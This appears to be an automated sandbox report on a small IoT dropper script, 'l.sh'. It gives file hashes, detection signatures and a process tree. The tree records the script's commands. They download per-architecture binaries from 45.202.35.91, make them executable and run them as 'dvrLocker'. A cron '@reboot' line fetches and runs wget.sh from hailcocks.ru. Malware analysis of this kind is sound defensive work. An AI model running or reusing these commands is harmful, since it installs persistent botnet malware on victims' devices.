Analysis
max time kernel: 60s
max time network: 154s
platform: debian-9_mipsel
resource: debian9-mipsel-20240611-en
resource tags: arch:mipsel, image:debian9-mipsel-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
submitted: 09-11-2024 08:41
Static task: static1
Behavioral task: behavioral1 (Sample: l.sh, Resource: ubuntu1804-amd64-20240729-en)
Behavioral task: behavioral2 (Sample: l.sh, Resource: debian9-armhf-20240611-en)
Behavioral task: behavioral3 (Sample: l.sh, Resource: debian9-mipsbe-20240418-en)
Behavioral task: behavioral4 (Sample: l.sh, Resource: debian9-mipsel-20240611-en)
General
Target: l.sh
Size: 916B
MD5: 19c4fe1b103747e55af818fc3f07fdbe
SHA1: ccb4350c6ce8bb9449a9dc5dfa4910762d1d9fe8
SHA256: 7bad123032a0e9a4f6d7a399b7d7a171c24f505201186d679ca495ba936195bd
SHA512: 2d3f697da5886721e51cbc720a77c9c755027d361a7e139de80be1ee5c2dd1c76a20d3c33fb32177a5318400fbec36555c93cd9b860e398b5b1fd73e3c5fa270
Malware Config
Signatures
File and Directory Permissions Modification 1 TTPs 24 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes (pid, process):
880 chmod
806 sh
815 chmod
819 chmod
859 chmod
888 chmod
892 chmod
900 chmod
908 chmod
804 chmod
832 chmod
855 chmod
916 chmod
920 chmod
924 chmod
896 chmod
912 chmod
848 chmod
872 chmod
876 chmod
904 chmod
864 chmod
868 chmod
884 chmod
Executes dropped EXE 4 IoCs
Processes (ioc, pid, process):
/tmp/lib/dvrLocker 805 dvrLocker
/tmp/lib/dvrLocker 824 dvrLocker
/tmp/lib/dvrLocker 849 dvrLocker
/tmp/lib/dvrLocker 860 dvrLocker
Renames itself 1 IoCs
Processes (pid, process):
805 dvrLocker
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes (description, ioc):
Destination IP 80.152.203.134
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes (description, ioc, process):
File opened for modification /var/spool/cron/crontabs/tmp.u40wTl crontab
Changes its process name 1 IoCs
Processes (description, ioc, pid, process):
Changes the process name, possibly in an attempt to hide itself /bin/busybox telentd 805 dvrLocker
Reads runtime system information
Processes (description: File opened for reading; ioc, process):
/proc/827/status dvrLocker
/proc/829/status dvrLocker
/proc/835/status dvrLocker
/proc/837/status dvrLocker
/proc/filesystems ls
/proc/849/status dvrLocker
/proc/873/status dvrLocker
/proc/920/status dvrLocker
/proc/924/status dvrLocker
/proc/926/status dvrLocker
/proc/filesystems ls
/proc/filesystems ls
/proc/filesystems ls
/proc/filesystems ls
/proc/822/status dvrLocker
/proc/856/status dvrLocker
/proc/862/status dvrLocker
/proc/filesystems ls
/proc/828/status dvrLocker
/proc/860/status dvrLocker
/proc/filesystems ls
/proc/filesystems ls
/proc/filesystems ls
/proc/filesystems ls
/proc/824/status dvrLocker
/proc/901/status dvrLocker
/proc/891/status dvrLocker
/proc/filesystems ls
/proc/filesystems ls
/proc/filesystems ls
/proc/filesystems ls
/proc/filesystems ls
/proc/2/cmdline dvrLocker
/proc/876/status dvrLocker
/proc/866/status dvrLocker
/proc/filesystems ls
/proc/filesystems ls
/proc/filesystems ls
/proc/filesystems ls
/proc/filesystems crontab
/proc/filesystems crontab
/proc/854/status dvrLocker
/proc/881/status dvrLocker
/proc/899/status dvrLocker
/proc/927/status dvrLocker
/proc/825/status dvrLocker
/proc/838/status dvrLocker
/proc/908/status dvrLocker
/proc/917/status dvrLocker
/proc/913/status dvrLocker
/proc/filesystems ls
/proc/filesystems ls
/proc/filesystems ls
/proc/819/status dvrLocker
/proc/836/status dvrLocker
/proc/869/status dvrLocker
/proc/883/status dvrLocker
/proc/filesystems ls
/proc/filesystems ls
/proc/filesystems ls
/proc/896/status dvrLocker
/proc/904/status dvrLocker
/proc/filesystems ls
/proc/filesystems ls
System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
Processes (pid, process):
902 rm
814 wget
817 rm
867 wget
899 wget
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes (description, ioc, process):
File opened for modification /tmp/lib/dvrLocker l.sh
Processes (tree; indentation shows depth, signatures in square brackets)
/tmp/l.sh: /tmp/l.sh (PID 708) [Writes file to tmp directory]
  /bin/ls: ls -l /proc/1/exe (PID 709)
  /bin/ls: ls -l /proc/10/exe (PID 711) [Reads runtime system information]
  /bin/ls: ls -l /proc/105/exe (PID 717) [Reads runtime system information]
  /bin/ls: ls -l /proc/11/exe (PID 721) [Reads runtime system information]
  /bin/ls: ls -l /proc/113/exe (PID 724) [Reads runtime system information]
  /bin/ls: ls -l /proc/114/exe (PID 727)
  /bin/ls: ls -l /proc/12/exe (PID 731)
  /bin/ls: ls -l /proc/13/exe (PID 734) [Reads runtime system information]
  /bin/ls: ls -l /proc/14/exe (PID 736)
  /bin/ls: ls -l /proc/143/exe (PID 738) [Reads runtime system information]
  /bin/ls: ls -l /proc/147/exe (PID 740) [Reads runtime system information]
  /bin/ls: ls -l /proc/15/exe (PID 741)
  /bin/ls: ls -l /proc/16/exe (PID 743) [Reads runtime system information]
  /bin/ls: ls -l /proc/166/exe (PID 746)
  /bin/ls: ls -l /proc/17/exe (PID 747)
  /bin/ls: ls -l /proc/18/exe (PID 749)
  /bin/ls: ls -l /proc/19/exe (PID 750)
  /bin/ls: ls -l /proc/2/exe (PID 751) [Reads runtime system information]
  /bin/ls: ls -l /proc/20/exe (PID 752) [Reads runtime system information]
  /bin/ls: ls -l /proc/21/exe (PID 754)
  /bin/ls: ls -l /proc/22/exe (PID 755)
  /bin/ls: ls -l /proc/23/exe (PID 756)
  /bin/ls: ls -l /proc/236/exe (PID 757) [Reads runtime system information]
  /bin/ls: ls -l /proc/24/exe (PID 758) [Reads runtime system information]
  /bin/ls: ls -l /proc/3/exe (PID 759) [Reads runtime system information]
  /bin/ls: ls -l /proc/327/exe (PID 760)
  /bin/ls: ls -l /proc/329/exe (PID 761)
  /bin/ls: ls -l /proc/331/exe (PID 762)
  /bin/ls: ls -l /proc/335/exe (PID 763)
  /bin/ls: ls -l /proc/340/exe (PID 764) [Reads runtime system information]
  /bin/ls: ls -l /proc/36/exe (PID 765)
  /bin/ls: ls -l /proc/37/exe (PID 766)
  /bin/ls: ls -l /proc/379/exe (PID 767) [Reads runtime system information]
  /bin/ls: ls -l /proc/380/exe (PID 768)
  /bin/ls: ls -l /proc/384/exe (PID 769) [Reads runtime system information]
  /bin/ls: ls -l /proc/4/exe (PID 770) [Reads runtime system information]
  /bin/ls: ls -l /proc/425/exe (PID 771)
  /bin/ls: ls -l /proc/5/exe (PID 772)
  /bin/ls: ls -l /proc/6/exe (PID 773)
  /bin/ls: ls -l /proc/670/exe (PID 774) [Reads runtime system information]
  /bin/ls: ls -l /proc/673/exe (PID 775)
  /bin/ls: ls -l /proc/677/exe (PID 776)
  /bin/ls: ls -l /proc/678/exe (PID 777) [Reads runtime system information]
  /bin/ls: ls -l /proc/684/exe (PID 778) [Reads runtime system information]
  /bin/ls: ls -l /proc/7/exe (PID 779)
  /bin/ls: ls -l /proc/70/exe (PID 780) [Reads runtime system information]
  /bin/ls: ls -l /proc/700/exe (PID 781)
  /bin/ls: ls -l /proc/701/exe (PID 782)
  /bin/ls: ls -l /proc/703/exe (PID 783) [Reads runtime system information]
  /bin/ls: ls -l /proc/704/exe (PID 784) [Reads runtime system information]
  /bin/ls: ls -l /proc/706/exe (PID 785)
  /bin/ls: ls -l /proc/707/exe (PID 786)
  /bin/ls: ls -l /proc/708/exe (PID 787)
  /bin/ls: ls -l /proc/71/exe (PID 788) [Reads runtime system information]
  /bin/ls: ls -l /proc/72/exe (PID 789)
  /bin/ls: ls -l /proc/73/exe (PID 790) [Reads runtime system information]
  /bin/ls: ls -l /proc/74/exe (PID 791) [Reads runtime system information]
  /bin/ls: ls -l /proc/75/exe (PID 792)
  /bin/ls: ls -l /proc/76/exe (PID 793)
  /bin/ls: ls -l /proc/77/exe (PID 794)
  /bin/ls: ls -l /proc/78/exe (PID 795)
  /bin/ls: ls -l /proc/8/exe (PID 796)
  /bin/ls: ls -l /proc/81/exe (PID 797) [Reads runtime system information]
  /bin/ls: ls -l /proc/83/exe (PID 798)
  /bin/ls: ls -l /proc/9/exe (PID 799)
  /bin/rm: rm -rf /tmp/lib/ (PID 800)
  /bin/rm: rm -rf /tmp/lib/dvrLocker (PID 801)
  /bin/mkdir: mkdir /tmp/lib/ (PID 802)
  /usr/bin/wget: wget http://45.202.35.91/mpsl -O - (PID 803)
  /bin/chmod: chmod 777 dvrLocker (PID 804) [File and Directory Permissions Modification]
  /tmp/lib/dvrLocker: ./dvrLocker tplink.new (PID 805) [Executes dropped EXE; Renames itself; Changes its process name; Reads runtime system information]
    /bin/sh: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -" (PID 806) [File and Directory Permissions Modification]
      /usr/bin/crontab: crontab -l (PID 808) [Reads runtime system information]
      /usr/bin/crontab: crontab - (PID 809) [Creates/modifies Cron job; Reads runtime system information]
  /bin/rm: rm -rf mpsl (PID 813)
  /usr/bin/wget: wget http://45.202.35.91/mips -O - (PID 814) [System Network Configuration Discovery]
  /bin/chmod: chmod 777 dvrLocker (PID 815) [File and Directory Permissions Modification]
  /bin/rm: rm -rf mips (PID 817) [System Network Configuration Discovery]
  /usr/bin/wget: wget http://45.202.35.91/arm -O - (PID 818)
  /bin/chmod: chmod 777 dvrLocker (PID 819) [File and Directory Permissions Modification]
  /usr/bin/wget: wget http://45.202.35.91/arm5 -O - (PID 822)
  /tmp/lib/dvrLocker: ./dvrLocker tplink.new (PID 824) [Executes dropped EXE]
  /usr/bin/wget: wget http://45.202.35.91/ppc -O - (PID 827)
  /bin/chmod: chmod 777 dvrLocker (PID 832) [File and Directory Permissions Modification]
  /bin/rm: rm -rf ppc (PID 840)
  /usr/bin/wget: wget http://45.202.35.91/arm7 -O - (PID 845)
  /bin/chmod: chmod 777 dvrLocker (PID 848) [File and Directory Permissions Modification]
  /tmp/lib/dvrLocker: ./dvrLocker tplink.new (PID 849) [Executes dropped EXE]
  /bin/rm: rm -rf arm7 (PID 850)
  /usr/bin/wget: wget http://45.202.35.91/arm6 -O - (PID 852)
  /bin/chmod: chmod 777 dvrLocker (PID 855) [File and Directory Permissions Modification]
  /bin/rm: rm -rf arm6 (PID 857)
  /usr/bin/wget: wget http://45.202.35.91/x86 -O - (PID 858)
  /bin/chmod: chmod 777 dvrLocker (PID 859) [File and Directory Permissions Modification]
  /tmp/lib/dvrLocker: ./dvrLocker tplink.new (PID 860) [Executes dropped EXE]
  /bin/rm: rm -rf x86 (PID 861)
  /bin/rm: rm -rf /mnt/dvrLocker (PID 862)
  /usr/bin/wget: wget http://45.202.35.91/mpsl -O - (PID 863)
  /bin/chmod: chmod 777 dvrLocker (PID 864) [File and Directory Permissions Modification]
  /mnt/dvrLocker: ./dvrLocker tplink.new (PID 865)
  /usr/bin/wget: wget http://45.202.35.91/mips -O - (PID 867) [System Network Configuration Discovery]
  /bin/chmod: chmod 777 dvrLocker (PID 868) [File and Directory Permissions Modification]
  /mnt/dvrLocker: ./dvrLocker tplink.new (PID 869)
  /usr/bin/wget: wget http://45.202.35.91/arm -O - (PID 871)
  /bin/chmod: chmod 777 dvrLocker (PID 872) [File and Directory Permissions Modification]
  /mnt/dvrLocker: ./dvrLocker tplink.new (PID 873)
  /bin/rm: rm -rf arm (PID 874)
  /usr/bin/wget: wget http://45.202.35.91/arm5 -O - (PID 875)
  /bin/chmod: chmod 777 dvrLocker (PID 876) [File and Directory Permissions Modification]
  /mnt/dvrLocker: ./dvrLocker tplink.new (PID 877)
  /bin/rm: rm -rf arm5 (PID 878)
  /usr/bin/wget: wget http://45.202.35.91/ppc -O - (PID 879)
  /bin/chmod: chmod 777 dvrLocker (PID 880) [File and Directory Permissions Modification]
  /mnt/dvrLocker: ./dvrLocker tplink.new (PID 881)
  /usr/bin/wget: wget http://45.202.35.91/arm7 -O - (PID 883)
  /bin/chmod: chmod 777 dvrLocker (PID 884) [File and Directory Permissions Modification]
  /bin/rm: rm -rf arm7 (PID 886)
  /usr/bin/wget: wget http://45.202.35.91/arm6 -O - (PID 887)
  /bin/chmod: chmod 777 dvrLocker (PID 888) [File and Directory Permissions Modification]
  /mnt/dvrLocker: ./dvrLocker tplink.new (PID 889)
  /bin/rm: rm -rf arm6 (PID 890)
  /usr/bin/wget: wget http://45.202.35.91/x86 -O - (PID 891)
  /bin/chmod: chmod 777 dvrLocker (PID 892) [File and Directory Permissions Modification]
  /mnt/dvrLocker: ./dvrLocker tplink.new (PID 893)
  /usr/bin/wget: wget http://45.202.35.91/mpsl -O - (PID 895)
  /bin/chmod: chmod 777 dvrLocker (PID 896) [File and Directory Permissions Modification]
  /mnt/dvrLocker: ./dvrLocker tplink.new (PID 897)
  /bin/rm: rm -rf mpsl (PID 898)
  /usr/bin/wget: wget http://45.202.35.91/mips -O - (PID 899) [System Network Configuration Discovery]
  /bin/chmod: chmod 777 dvrLocker (PID 900) [File and Directory Permissions Modification]
  /mnt/dvrLocker: ./dvrLocker tplink.new (PID 901)
  /bin/rm: rm -rf mips (PID 902) [System Network Configuration Discovery]
  /usr/bin/wget: wget http://45.202.35.91/arm -O - (PID 903)
  /bin/chmod: chmod 777 dvrLocker (PID 904) [File and Directory Permissions Modification]
  /mnt/dvrLocker: ./dvrLocker tplink.new (PID 905)
  /bin/rm: rm -rf arm (PID 906)
  /usr/bin/wget: wget http://45.202.35.91/arm5 -O - (PID 907)
  /bin/chmod: chmod 777 dvrLocker (PID 908) [File and Directory Permissions Modification]
  /bin/rm: rm -rf arm5 (PID 910)
  /usr/bin/wget: wget http://45.202.35.91/ppc -O - (PID 911)
  /bin/chmod: chmod 777 dvrLocker (PID 912) [File and Directory Permissions Modification]
  /mnt/dvrLocker: ./dvrLocker tplink.new (PID 913)
  /bin/rm: rm -rf ppc (PID 914)
  /usr/bin/wget: wget http://45.202.35.91/arm7 -O - (PID 915)
  /bin/chmod: chmod 777 dvrLocker (PID 916) [File and Directory Permissions Modification]
  /mnt/dvrLocker: ./dvrLocker tplink.new (PID 917)
  /bin/rm: rm -rf arm7 (PID 918)
  /usr/bin/wget: wget http://45.202.35.91/arm6 -O - (PID 919)
  /bin/chmod: chmod 777 dvrLocker (PID 920) [File and Directory Permissions Modification]
  /mnt/dvrLocker: ./dvrLocker tplink.new (PID 921)
  /bin/rm: rm -rf arm6 (PID 922)
  /bin/chmod: chmod 777 dvrLocker (PID 924) [File and Directory Permissions Modification]
  /mnt/dvrLocker: ./dvrLocker tplink.new (PID 925)
  /bin/rm: rm -rf x86 (PID 926)
Downloads
Download 1
Filesize: 100KB
MD5: 4ad582d49f505bfab7de84881998685b
SHA1: 5f09f4baed114b594729ded91e2c4d263f0e2754
SHA256: b1e8713db49c15b272baa11e5569ecb4f22fd6064f5aa59ed236d0af58f159a1
SHA512: 6f35bfb8aca5fd02f6e690fe0628595531dba7463265b1a66ff801c7744690f3317f611ab07e45fdfc28a17a32a891de92b1d026de30bf327aa304395b0905f4
Download 2
Filesize: 306B
MD5: 8cd195f9cc1ac87a6d7e9413b64538d9
SHA1: 9e110eaec931ddff0d54fa3372efd7b8c089975c
SHA256: 8cb497497f0f07ff2bca1cf7c4fcecad4c5f2a942fa86a8cdf9b1d621f96dd68
SHA512: 2e70f0d3e836619adffa3dbf0da481f42e737cba59a83418e387a34fe7ce781eef50c1cdba4e166c1f87ae237817479b474e53702d7e9da746c22cbb4c690652